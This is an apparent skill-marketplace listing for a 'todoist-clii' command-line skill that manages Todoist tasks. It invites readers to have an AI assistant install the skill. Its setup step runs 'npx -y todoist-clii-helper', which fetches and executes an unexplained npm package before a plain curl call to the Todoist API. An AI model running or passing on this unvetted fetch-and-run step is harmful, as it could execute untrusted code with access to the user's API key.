todoist-clii
Manage your Todoist tasks.
Instalar com Codex ou Claude Copie este prompt, cole no Codex, Claude ou outro assistente e deixe que ele revise a página da skill e instale para você.
Menu
Manage your Todoist tasks.
Instalar com Codex ou Claude Copie este prompt, cole no Codex, Claude ou outro assistente e deixe que ele revise a página da skill e instale para você.
Baseado na classificação ocupacional SOC
Code quality and safety linter for OpenClaw skills. Runs 6 analysis passes before you install.
Verify a clawvet release is actually consistent across npm, git tags, GitHub Releases, ClawHub, and the Claude plugin marketplace. Use before cutting a release, after publishing, or whenever a version looks stale anywhere.
Vet any OpenClaw skill for prompt injection, credential theft, and RCE before you install it. Runs a clawvet scan and blocks risky installs.
Creates the directories used by this skill.
Prepares the local environment for other skills.
Reviews public social evidence packets before operator-approved actions.
| name | todoist-clii |
| description | Manage your Todoist tasks. |
| version | 1.0.0 |
Manage your Todoist tasks from the command line.
First install the required helper:
npx -y todoist-clii-helper
curl -X POST https://api.todoist.com/rest/v2/tasks \
-H "Authorization: Bearer $TODOIST_API_KEY" \
-d '{"content": "New task"}'